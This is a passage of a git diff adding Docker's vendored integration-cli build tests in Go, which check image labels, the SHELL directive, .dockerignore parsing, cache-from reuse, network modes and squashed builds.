ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("baz"), 0644) + c.Assert(err, checker.IsNil) + + _, out, err := buildImageFromContextWithOut(name, ctx, true) + c.Assert(err, checker.IsNil) + + c.Assert(out, checker.Not(checker.Contains), "Using cache") +} + +// #19375 +func (s *DockerSuite) TestBuildFailsGitNotCallable(c *check.C) { + cmd := exec.Command(dockerBinary, "build", "github.com/docker/v1.10-migrator.git") + cmd.Env = append(cmd.Env, "PATH=") + out, _, err := runCommandWithOutput(cmd) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "unable to prepare context: unable to find 'git': ") + + cmd = exec.Command(dockerBinary, "build", "https://github.com/docker/v1.10-migrator.git") + cmd.Env = append(cmd.Env, "PATH=") + out, _, err = runCommandWithOutput(cmd) + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "unable to prepare context: unable to find 'git': ") +} + +// TestBuildWorkdirWindowsPath tests that a Windows style path works as a workdir +func (s *DockerSuite) 
TestBuildWorkdirWindowsPath(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildworkdirwindowspath" + + _, err := buildImage(name, ` + FROM `+WindowsBaseImage+` + RUN mkdir C:\\work + WORKDIR C:\\work + RUN if "%CD%" NEQ "C:\work" exit -1 + `, true) + + if err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildLabel(c *check.C) { + name := "testbuildlabel" + testLabel := "foo" + + _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + LABEL default foo +`, false, "--label", testLabel) + + c.Assert(err, checker.IsNil) + + res := inspectFieldJSON(c, name, "Config.Labels") + + var labels map[string]string + + if err := json.Unmarshal([]byte(res), &labels); err != nil { + c.Fatal(err) + } + + if _, ok := labels[testLabel]; !ok { + c.Fatal("label not found in image") + } +} + +func (s *DockerSuite) TestBuildLabelOneNode(c *check.C) { + name := "testbuildlabel" + + _, err := buildImage(name, "FROM busybox", false, "--label", "foo=bar") + + c.Assert(err, checker.IsNil) + + res, err := inspectImage(name, "json .Config.Labels") + c.Assert(err, checker.IsNil) + var labels map[string]string + + if err := json.Unmarshal([]byte(res), &labels); err != nil { + c.Fatal(err) + } + + v, ok := labels["foo"] + if !ok { + c.Fatal("label `foo` not found in image") + } + c.Assert(v, checker.Equals, "bar") +} + +func (s *DockerSuite) TestBuildLabelCacheCommit(c *check.C) { + name := "testbuildlabelcachecommit" + testLabel := "foo" + + if _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + LABEL default foo + `, false); err != nil { + c.Fatal(err) + } + + _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + LABEL default foo +`, true, "--label", testLabel) + + c.Assert(err, checker.IsNil) + + res := inspectFieldJSON(c, name, "Config.Labels") + + var labels map[string]string + + if err := json.Unmarshal([]byte(res), &labels); err != nil { + c.Fatal(err) + } + + if _, ok := labels[testLabel]; !ok { + c.Fatal("label not found in image") + 
} +} + +func (s *DockerSuite) TestBuildLabelMultiple(c *check.C) { + name := "testbuildlabelmultiple" + testLabels := map[string]string{ + "foo": "bar", + "123": "456", + } + + labelArgs := []string{} + + for k, v := range testLabels { + labelArgs = append(labelArgs, "--label", k+"="+v) + } + + _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + LABEL default foo +`, false, labelArgs...) + + if err != nil { + c.Fatal("error building image with labels", err) + } + + res := inspectFieldJSON(c, name, "Config.Labels") + + var labels map[string]string + + if err := json.Unmarshal([]byte(res), &labels); err != nil { + c.Fatal(err) + } + + for k, v := range testLabels { + if x, ok := labels[k]; !ok || x != v { + c.Fatalf("label %s=%s not found in image", k, v) + } + } +} + +func (s *DockerSuite) TestBuildLabelOverwrite(c *check.C) { + name := "testbuildlabeloverwrite" + testLabel := "foo" + testValue := "bar" + + _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + LABEL `+testLabel+`+ foo +`, false, []string{"--label", testLabel + "=" + testValue}...) 
+ + if err != nil { + c.Fatal("error building image with labels", err) + } + + res := inspectFieldJSON(c, name, "Config.Labels") + + var labels map[string]string + + if err := json.Unmarshal([]byte(res), &labels); err != nil { + c.Fatal(err) + } + + v, ok := labels[testLabel] + if !ok { + c.Fatal("label not found in image") + } + + if v != testValue { + c.Fatal("label not overwritten") + } +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestBuildFromAuthenticatedRegistry(c *check.C) { + dockerCmd(c, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + + baseImage := privateRegistryURL + "/baseimage" + + _, err := buildImage(baseImage, ` + FROM busybox + ENV env1 val1 + `, true) + + c.Assert(err, checker.IsNil) + + dockerCmd(c, "push", baseImage) + dockerCmd(c, "rmi", baseImage) + + _, err = buildImage(baseImage, fmt.Sprintf(` + FROM %s + ENV env2 val2 + `, baseImage), true) + + c.Assert(err, checker.IsNil) +} + +func (s *DockerRegistryAuthHtpasswdSuite) TestBuildWithExternalAuth(c *check.C) { + osPath := os.Getenv("PATH") + defer os.Setenv("PATH", osPath) + + workingDir, err := os.Getwd() + c.Assert(err, checker.IsNil) + absolute, err := filepath.Abs(filepath.Join(workingDir, "fixtures", "auth")) + c.Assert(err, checker.IsNil) + testPath := fmt.Sprintf("%s%c%s", osPath, filepath.ListSeparator, absolute) + + os.Setenv("PATH", testPath) + + repoName := fmt.Sprintf("%v/dockercli/busybox:authtest", privateRegistryURL) + + tmp, err := ioutil.TempDir("", "integration-cli-") + c.Assert(err, checker.IsNil) + + externalAuthConfig := `{ "credsStore": "shell-test" }` + + configPath := filepath.Join(tmp, "config.json") + err = ioutil.WriteFile(configPath, []byte(externalAuthConfig), 0644) + c.Assert(err, checker.IsNil) + + dockerCmd(c, "--config", tmp, "login", "-u", s.reg.username, "-p", s.reg.password, privateRegistryURL) + + b, err := ioutil.ReadFile(configPath) + c.Assert(err, checker.IsNil) + c.Assert(string(b), checker.Not(checker.Contains), 
"\"auth\":") + + dockerCmd(c, "--config", tmp, "tag", "busybox", repoName) + dockerCmd(c, "--config", tmp, "push", repoName) + + // make sure the image is pulled when building + dockerCmd(c, "rmi", repoName) + + buildCmd := exec.Command(dockerBinary, "--config", tmp, "build", "-") + buildCmd.Stdin = strings.NewReader(fmt.Sprintf("FROM %s", repoName)) + + out, _, err := runCommandWithOutput(buildCmd) + c.Assert(err, check.IsNil, check.Commentf(out)) +} + +// Test cases in #22036 +func (s *DockerSuite) TestBuildLabelsOverride(c *check.C) { + // Command line option labels will always override + name := "scratchy" + expected := `{"bar":"from-flag","foo":"from-flag"}` + _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + LABEL foo=from-dockerfile`, + true, "--label", "foo=from-flag", "--label", "bar=from-flag") + c.Assert(err, check.IsNil) + + res := inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + + name = "from" + expected = `{"foo":"from-dockerfile"}` + _, err = buildImage(name, + `FROM `+minimalBaseImage()+` + LABEL foo from-dockerfile`, + true) + c.Assert(err, check.IsNil) + + res = inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + + // Command line option label will override even via `FROM` + name = "new" + expected = `{"bar":"from-dockerfile2","foo":"new"}` + _, err = buildImage(name, + `FROM from + LABEL bar from-dockerfile2`, + true, "--label", "foo=new") + c.Assert(err, check.IsNil) + + res = inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + + // Command line option without a value set (--label foo, --label bar=) + // will be treated as --label foo="", --label bar="" + name = "scratchy2" + expected = `{"bar":"","foo":""}` + _, err = buildImage(name, + `FROM `+minimalBaseImage()+` + LABEL foo=from-dockerfile`, + true, "--label", 
"foo", "--label", "bar=") + c.Assert(err, check.IsNil) + + res = inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + + // Command line option without a value set (--label foo, --label bar=) + // will be treated as --label foo="", --label bar="" + // This time is for inherited images + name = "new2" + expected = `{"bar":"","foo":""}` + _, err = buildImage(name, + `FROM from + LABEL bar from-dockerfile2`, + true, "--label", "foo=", "--label", "bar") + c.Assert(err, check.IsNil) + + res = inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + + // Command line option labels with only `FROM` + name = "scratchy" + expected = `{"bar":"from-flag","foo":"from-flag"}` + _, err = buildImage(name, + `FROM `+minimalBaseImage(), + true, "--label", "foo=from-flag", "--label", "bar=from-flag") + c.Assert(err, check.IsNil) + + res = inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + + // Command line option labels with env var + name = "scratchz" + expected = `{"bar":"$PATH"}` + _, err = buildImage(name, + `FROM `+minimalBaseImage(), + true, "--label", "bar=$PATH") + c.Assert(err, check.IsNil) + + res = inspectFieldJSON(c, name, "Config.Labels") + if res != expected { + c.Fatalf("Labels %s, expected %s", res, expected) + } + +} + +// Test case for #22855 +func (s *DockerSuite) TestBuildDeleteCommittedFile(c *check.C) { + name := "test-delete-committed-file" + + _, err := buildImage(name, + `FROM busybox + RUN echo test > file + RUN test -e file + RUN rm file + RUN sh -c "! test -e file"`, false) + if err != nil { + c.Fatal(err) + } +} + +// #20083 +func (s *DockerSuite) TestBuildDockerignoreComment(c *check.C) { + // TODO Windows: Figure out why this test is flakey on TP5. 
If you add + // something like RUN sleep 5, or even RUN ls /tmp after the ADD line, + // it is more reliable, but that's not a good fix. + testRequires(c, DaemonIsLinux) + + name := "testbuilddockerignorecleanpaths" + dockerfile := ` + FROM busybox + ADD . /tmp/ + RUN sh -c "(ls -la /tmp/#1)" + RUN sh -c "(! ls -la /tmp/#2)" + RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (ls /tmp/dir1/foo)"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "foo", + "foo2": "foo2", + "dir1/foo": "foo in dir1", + "#1": "# file 1", + "#2": "# file 2", + ".dockerignore": `# Visual C++ cache files +# because we have git ;-) +# The above comment is from #20083 +foo +#dir1/foo +foo2 +# The following is considered as comment as # is at the beginning +#1 +# The following is not considered as comment as # is not at the beginning + #2 +`, + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// Test case for #23221 +func (s *DockerSuite) TestBuildWithUTF8BOM(c *check.C) { + name := "test-with-utf8-bom" + dockerfile := []byte(`FROM busybox`) + bomDockerfile := append([]byte{0xEF, 0xBB, 0xBF}, dockerfile...) + ctx, err := fakeContextFromNewTempDir() + c.Assert(err, check.IsNil) + defer ctx.Close() + err = ctx.addFile("Dockerfile", bomDockerfile) + c.Assert(err, check.IsNil) + _, err = buildImageFromContext(name, ctx, true) + c.Assert(err, check.IsNil) +} + +// Test case for UTF-8 BOM in .dockerignore, related to #23221 +func (s *DockerSuite) TestBuildWithUTF8BOMDockerignore(c *check.C) { + name := "test-with-utf8-bom-dockerignore" + dockerfile := ` + FROM busybox + ADD . /tmp/ + RUN ls -la /tmp + RUN sh -c "! ls /tmp/Dockerfile" + RUN ls /tmp/.dockerignore` + dockerignore := []byte("./Dockerfile\n") + bomDockerignore := append([]byte{0xEF, 0xBB, 0xBF}, dockerignore...) 
+ ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": dockerfile, + }) + c.Assert(err, check.IsNil) + defer ctx.Close() + err = ctx.addFile(".dockerignore", bomDockerignore) + c.Assert(err, check.IsNil) + _, err = buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } +} + +// #22489 Shell test to confirm config gets updated correctly +func (s *DockerSuite) TestBuildShellUpdatesConfig(c *check.C) { + name := "testbuildshellupdatesconfig" + + expected := `["foo","-bar","#(nop) ","SHELL [foo -bar]"]` + _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + SHELL ["foo", "-bar"]`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "ContainerConfig.Cmd") + if res != expected { + c.Fatalf("%s, expected %s", res, expected) + } + res = inspectFieldJSON(c, name, "ContainerConfig.Shell") + if res != `["foo","-bar"]` { + c.Fatalf(`%s, expected ["foo","-bar"]`, res) + } +} + +// #22489 Changing the shell multiple times and CMD after. +func (s *DockerSuite) TestBuildShellMultiple(c *check.C) { + name := "testbuildshellmultiple" + + _, out, _, err := buildImageWithStdoutStderr(name, + `FROM busybox + RUN echo defaultshell + SHELL ["echo"] + RUN echoshell + SHELL ["ls"] + RUN -l + CMD -l`, + true) + if err != nil { + c.Fatal(err) + } + + // Must contain 'defaultshell' twice + if len(strings.Split(out, "defaultshell")) != 3 { + c.Fatalf("defaultshell should have appeared twice in %s", out) + } + + // Must contain 'echoshell' twice + if len(strings.Split(out, "echoshell")) != 3 { + c.Fatalf("echoshell should have appeared twice in %s", out) + } + + // Must contain "total " (part of ls -l) + if !strings.Contains(out, "total ") { + c.Fatalf("%s should have contained 'total '", out) + } + + // A container started from the image uses the shell-form CMD. + // Last shell is ls. CMD is -l. So should contain 'total '. 
+ outrun, _ := dockerCmd(c, "run", "--rm", name) + if !strings.Contains(outrun, "total ") { + c.Fatalf("Expected started container to run ls -l. %s", outrun) + } +} + +// #22489. Changed SHELL with ENTRYPOINT +func (s *DockerSuite) TestBuildShellEntrypoint(c *check.C) { + name := "testbuildshellentrypoint" + + _, err := buildImage(name, + `FROM busybox + SHELL ["ls"] + ENTRYPOINT -l`, + true) + if err != nil { + c.Fatal(err) + } + + // A container started from the image uses the shell-form ENTRYPOINT. + // Shell is ls. ENTRYPOINT is -l. So should contain 'total '. + outrun, _ := dockerCmd(c, "run", "--rm", name) + if !strings.Contains(outrun, "total ") { + c.Fatalf("Expected started container to run ls -l. %s", outrun) + } +} + +// #22489 Shell test to confirm shell is inherited in a subsequent build +func (s *DockerSuite) TestBuildShellInherited(c *check.C) { + name1 := "testbuildshellinherited1" + _, err := buildImage(name1, + `FROM busybox + SHELL ["ls"]`, + true) + if err != nil { + c.Fatal(err) + } + + name2 := "testbuildshellinherited2" + _, out, _, err := buildImageWithStdoutStderr(name2, + `FROM `+name1+` + RUN -l`, + true) + if err != nil { + c.Fatal(err) + } + + // ls -l has "total " followed by some number in it, ls without -l does not. + if !strings.Contains(out, "total ") { + c.Fatalf("Should have seen total in 'ls -l'.\n%s", out) + } +} + +// #22489 Shell test to confirm non-JSON doesn't work +func (s *DockerSuite) TestBuildShellNotJSON(c *check.C) { + name := "testbuildshellnotjson" + + _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + sHeLl exec -form`, // Casing explicit to ensure error is upper-cased. 
+ true) + if err == nil { + c.Fatal("Image build should have failed") + } + if !strings.Contains(err.Error(), "SHELL requires the arguments to be in JSON form") { + c.Fatal("Error didn't indicate that arguments must be in JSON form") + } +} + +// #22489 Windows shell test to confirm native is powershell if executing a PS command +// This would error if the default shell were still cmd. +func (s *DockerSuite) TestBuildShellWindowsPowershell(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildshellpowershell" + _, out, err := buildImageWithOut(name, + `FROM `+minimalBaseImage()+` + SHELL ["powershell", "-command"] + RUN Write-Host John`, + true) + if err != nil { + c.Fatal(err) + } + if !strings.Contains(out, "\nJohn\n") { + c.Fatalf("Line with 'John' not found in output %q", out) + } +} + +// Verify that escape is being correctly applied to words when escape directive is not \. +// Tests WORKDIR, ADD +func (s *DockerSuite) TestBuildEscapeNotBackslashWordTest(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildescapenotbackslashwordtesta" + _, out, err := buildImageWithOut(name, + `# escape= `+"`"+` + FROM `+minimalBaseImage()+` + WORKDIR c:\windows + RUN dir /w`, + true) + if err != nil { + c.Fatal(err) + } + if !strings.Contains(strings.ToLower(out), "[system32]") { + c.Fatalf("Line with '[windows]' not found in output %q", out) + } + + name = "testbuildescapenotbackslashwordtestb" + _, out, err = buildImageWithOut(name, + `# escape= `+"`"+` + FROM `+minimalBaseImage()+` + SHELL ["powershell.exe"] + WORKDIR c:\foo + ADD Dockerfile c:\foo\ + RUN dir Dockerfile`, + true) + if err != nil { + c.Fatal(err) + } + if !strings.Contains(strings.ToLower(out), "-a----") { + c.Fatalf("Line with '-a----' not found in output %q", out) + } + +} + +// #22868. 
Make sure shell-form CMD is marked as escaped in the config of the image +func (s *DockerSuite) TestBuildCmdShellArgsEscaped(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildcmdshellescaped" + _, err := buildImage(name, ` + FROM `+minimalBaseImage()+` + CMD "ipconfig" + `, true) + if err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "Config.ArgsEscaped") + if res != "true" { + c.Fatalf("CMD did not update Config.ArgsEscaped on image: %v", res) + } + dockerCmd(c, "run", "--name", "inspectme", name) + dockerCmd(c, "wait", "inspectme") + res = inspectFieldJSON(c, name, "Config.Cmd") + + if res != `["cmd","/S","/C","\"ipconfig\""]` { + c.Fatalf("CMD was not escaped Config.Cmd: got %v", res) + } +} + +// Test case for #24912. +func (s *DockerSuite) TestBuildStepsWithProgress(c *check.C) { + name := "testbuildstepswithprogress" + + totalRun := 5 + _, out, err := buildImageWithOut(name, "FROM busybox\n"+strings.Repeat("RUN echo foo\n", totalRun), true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, fmt.Sprintf("Step 1/%d : FROM busybox", 1+totalRun)) + for i := 2; i <= 1+totalRun; i++ { + c.Assert(out, checker.Contains, fmt.Sprintf("Step %d/%d : RUN echo foo", i, 1+totalRun)) + } +} + +func (s *DockerSuite) TestBuildWithFailure(c *check.C) { + name := "testbuildwithfailure" + + // First test case can only detect `nobody` in runtime so all steps will show up + buildCmd := "FROM busybox\nRUN nobody" + _, stdout, _, err := buildImageWithStdoutStderr(name, buildCmd, false, "--force-rm", "--rm") + c.Assert(err, checker.NotNil) + c.Assert(stdout, checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(stdout, checker.Contains, "Step 2/2 : RUN nobody") + + // Second test case `FFOM` should have been detected before build runs so no steps + buildCmd = "FFOM nobody\nRUN nobody" + _, stdout, _, err = buildImageWithStdoutStderr(name, buildCmd, false, "--force-rm", "--rm") + c.Assert(err, checker.NotNil) + c.Assert(stdout, 
checker.Not(checker.Contains), "Step 1/2 : FROM busybox") + c.Assert(stdout, checker.Not(checker.Contains), "Step 2/2 : RUN nobody") +} + +func (s *DockerSuite) TestBuildCacheFrom(c *check.C) { + testRequires(c, DaemonIsLinux) // All tests that do save are skipped in windows + dockerfile := ` + FROM busybox + ENV FOO=bar + ADD baz / + RUN touch bax` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": dockerfile, + "baz": "baz", + }) + c.Assert(err, checker.IsNil) + defer ctx.Close() + + id1, err := buildImageFromContext("build1", ctx, true) + c.Assert(err, checker.IsNil) + + // rebuild with cache-from + id2, out, err := buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1") + c.Assert(err, checker.IsNil) + c.Assert(id1, checker.Equals, id2) + c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3) + dockerCmd(c, "rmi", "build2") + + // no cache match with unknown source + id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=nosuchtag") + c.Assert(err, checker.IsNil) + c.Assert(id1, checker.Not(checker.Equals), id2) + c.Assert(strings.Count(out, "Using cache"), checker.Equals, 0) + dockerCmd(c, "rmi", "build2") + + // clear parent images + tempDir, err := ioutil.TempDir("", "test-build-cache-from-") + if err != nil { + c.Fatalf("failed to create temporary directory: %s", tempDir) + } + defer os.RemoveAll(tempDir) + tempFile := filepath.Join(tempDir, "img.tar") + dockerCmd(c, "save", "-o", tempFile, "build1") + dockerCmd(c, "rmi", "build1") + dockerCmd(c, "load", "-i", tempFile) + parentID, _ := dockerCmd(c, "inspect", "-f", "{{.Parent}}", "build1") + c.Assert(strings.TrimSpace(parentID), checker.Equals, "") + + // cache still applies without parents + id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1") + c.Assert(err, checker.IsNil) + c.Assert(id1, checker.Equals, id2) + c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3) + history1, _ := 
dockerCmd(c, "history", "-q", "build2") + + // Retry, no new intermediate images + id3, out, err := buildImageFromContextWithOut("build3", ctx, true, "--cache-from=build1") + c.Assert(err, checker.IsNil) + c.Assert(id1, checker.Equals, id3) + c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3) + history2, _ := dockerCmd(c, "history", "-q", "build3") + + c.Assert(history1, checker.Equals, history2) + dockerCmd(c, "rmi", "build2") + dockerCmd(c, "rmi", "build3") + dockerCmd(c, "rmi", "build1") + dockerCmd(c, "load", "-i", tempFile) + + // Modify file, everything up to last command and layers are reused + dockerfile = ` + FROM busybox + ENV FOO=bar + ADD baz / + RUN touch newfile` + err = ioutil.WriteFile(filepath.Join(ctx.Dir, "Dockerfile"), []byte(dockerfile), 0644) + c.Assert(err, checker.IsNil) + + id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1") + c.Assert(err, checker.IsNil) + c.Assert(id1, checker.Not(checker.Equals), id2) + c.Assert(strings.Count(out, "Using cache"), checker.Equals, 2) + + layers1Str, _ := dockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build1") + layers2Str, _ := dockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build2") + + var layers1 []string + var layers2 []string + c.Assert(json.Unmarshal([]byte(layers1Str), &layers1), checker.IsNil) + c.Assert(json.Unmarshal([]byte(layers2Str), &layers2), checker.IsNil) + + c.Assert(len(layers1), checker.Equals, len(layers2)) + for i := 0; i < len(layers1)-1; i++ { + c.Assert(layers1[i], checker.Equals, layers2[i]) + } + c.Assert(layers1[len(layers1)-1], checker.Not(checker.Equals), layers2[len(layers1)-1]) +} + +func (s *DockerSuite) TestBuildNetNone(c *check.C) { + testRequires(c, DaemonIsLinux) + + name := "testbuildnetnone" + _, out, err := buildImageWithOut(name, ` + FROM busybox + RUN ping -c 1 8.8.8.8 + `, true, "--network=none") + c.Assert(err, checker.NotNil) + c.Assert(out, checker.Contains, "unreachable") +} + +func (s 
*DockerSuite) TestBuildNetContainer(c *check.C) { + testRequires(c, DaemonIsLinux) + + id, _ := dockerCmd(c, "run", "--hostname", "foobar", "-d", "busybox", "nc", "-ll", "-p", "1234", "-e", "hostname") + + name := "testbuildnetcontainer" + out, err := buildImage(name, ` + FROM busybox + RUN nc localhost 1234 > /otherhost + `, true, "--network=container:"+strings.TrimSpace(id)) + c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + + host, _ := dockerCmd(c, "run", "testbuildnetcontainer", "cat", "/otherhost") + c.Assert(strings.TrimSpace(host), check.Equals, "foobar") +} + +func (s *DockerSuite) TestBuildSquashParent(c *check.C) { + testRequires(c, ExperimentalDaemon) + dockerFile := ` + FROM busybox + RUN echo hello > /hello + RUN echo world >> /hello + RUN echo hello > /remove_me + ENV HELLO world + RUN rm /remove_me + ` + // build and get the ID that we can use later for history comparison + origID, err := buildImage("test", dockerFile, false) + c.Assert(err, checker.IsNil) + + // build with squash + id, err := buildImage("test", dockerFile, true, "--squash") + c.Assert(err, checker.IsNil) + + out, _ := dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", "cat /hello") + c.Assert(strings.TrimSpace(out), checker.Equals, "hello\nworld") + + dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", "[ ! 
-f /remove_me ]") + dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", `[ "$(echo $HELLO)" == "world" ]`) + + // make sure the ID produced is the ID of the tag we specified + inspectID, err := inspectImage("test", ".ID") + c.Assert(err, checker.IsNil) + c.Assert(inspectID, checker.Equals, id) + + origHistory, _ := dockerCmd(c, "history", origID) + testHistory, _ := dockerCmd(c, "history", "test") + + splitOrigHistory := strings.Split(strings.TrimSpace(origHistory), "\n") + splitTestHistory := strings.Split(strings.TrimSpace(testHistory), "\n") + c.Assert(len(splitTestHistory), checker.Equals, len(splitOrigHistory)+1) + + out, err = inspectImage(id, "len .RootFS.Layers") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, "3") +} + +func (s *DockerSuite) TestBuildContChar(c *check.C) { + name := "testbuildcontchar" + + _, out, err := buildImageWithOut(name, + `FROM busybox\`, true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Step 1/1 : FROM busybox") + + _, out, err = buildImageWithOut(name, + `FROM busybox + RUN echo hi \`, true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi\n") + + _, out, err = buildImageWithOut(name, + `FROM busybox + RUN echo hi \\`, true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi \\\n") + + _, out, err = buildImageWithOut(name, + `FROM busybox + RUN echo hi \\\`, true) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi \\\\\n") +} + +// TestBuildOpaqueDirectory tests that a build succeeds which +// creates opaque directories. 
+// See https://github.com/docker/docker/issues/25244 +func (s *DockerSuite) TestBuildOpaqueDirectory(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerFile := ` + FROM busybox + RUN mkdir /dir1 && touch /dir1/f1 + RUN rm -rf /dir1 && mkdir /dir1 && touch /dir1/f2 + RUN touch /dir1/f3 + RUN [ -f /dir1/f2 ] + ` + + // Test that build succeeds, last command fails if opaque directory + // was not handled correctly + _, err := buildImage("testopaquedirectory", dockerFile, false) + c.Assert(err, checker.IsNil) +} + +// Windows test for USER in dockerfile +func (s *DockerSuite) TestBuildWindowsUser(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildwindowsuser" + _, out, err := buildImageWithOut(name, + `FROM `+WindowsBaseImage+` + RUN net user user /add + USER user + RUN set username + `, + true) + if err != nil { + c.Fatal(err) + } + c.Assert(strings.ToLower(out), checker.Contains, "username=user") +} + +// Verifies if COPY file . when WORKDIR is set to a non-existing directory, +// the directory is created and the file is copied into the directory, +// as opposed to the file being copied as a file with the name of the +// directory. Fix for 27545 (found on Windows, but regression good for Linux too). +// Note 27545 was reverted in 28505, but a new fix was added subsequently in 28514. +func (s *DockerSuite) TestBuildCopyFileDotWithWorkdir(c *check.C) { + name := "testbuildcopyfiledotwithworkdir" + ctx, err := fakeContext(`FROM busybox +WORKDIR /foo +COPY file . 
+RUN ["cat", "/foo/file"] +`, + map[string]string{}) + + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if err := ctx.Add("file", "content"); err != nil { + c.Fatal(err) + } + + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +// Case-insensitive environment variables on Windows +func (s *DockerSuite) TestBuildWindowsEnvCaseInsensitive(c *check.C) { + testRequires(c, DaemonIsWindows) + name := "testbuildwindowsenvcaseinsensitive" + if _, err := buildImage(name, ` + FROM `+WindowsBaseImage+` + ENV FOO=bar foo=bar + `, true); err != nil { + c.Fatal(err) + } + res := inspectFieldJSON(c, name, "Config.Env") + if res != `["foo=bar"]` { // Should not have FOO=bar in it - takes the last one processed. And only one entry as deduped. + c.Fatalf("Case insensitive environment variables on Windows failed. Got %s", res) + } +} + +// Test case for 29667 +func (s *DockerSuite) TestBuildWorkdirImageCmd(c *check.C) { + testRequires(c, DaemonIsLinux) + + image := "testworkdirimagecmd" + dockerfile := ` +FROM busybox +WORKDIR /foo/bar +` + out, err := buildImage(image, dockerfile, true) + c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) + + out, _ = dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image) + c.Assert(strings.TrimSpace(out), checker.Equals, `["sh"]`) + + image = "testworkdirlabelimagecmd" + dockerfile = ` +FROM busybox +WORKDIR /foo/bar +LABEL a=b +` + out, err = buildImage(image, dockerfile, true) + c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) + + out, _ = dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image) + c.Assert(strings.TrimSpace(out), checker.Equals, `["sh"]`) +} + +// Test case for 28902/28090 +func (s *DockerSuite) TestBuildWorkdirCmd(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerFile := ` + FROM golang:1.7-alpine + WORKDIR / + ` + _, err := buildImage("testbuildworkdircmd", dockerFile, true) + c.Assert(err, checker.IsNil) + + _, out, 
err := buildImageWithOut("testbuildworkdircmd", dockerFile, true) + c.Assert(err, checker.IsNil) + c.Assert(strings.Count(out, "Using cache"), checker.Equals, 1) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go new file mode 100644 index 0000000000..0205a927dd --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go @@ -0,0 +1,207 @@ +// +build !windows + +package main + +import ( + "bufio" + "bytes" + "encoding/json" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "regexp" + "strings" + "time" + + "github.com/docker/docker/pkg/integration" + "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/go-units" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestBuildResourceConstraintsAreUsed(c *check.C) { + testRequires(c, cpuCfsQuota) + name := "testbuildresourceconstraints" + + ctx, err := fakeContext(` + FROM hello-world:frozen + RUN ["/hello"] + `, map[string]string{}) + c.Assert(err, checker.IsNil) + + _, _, err = 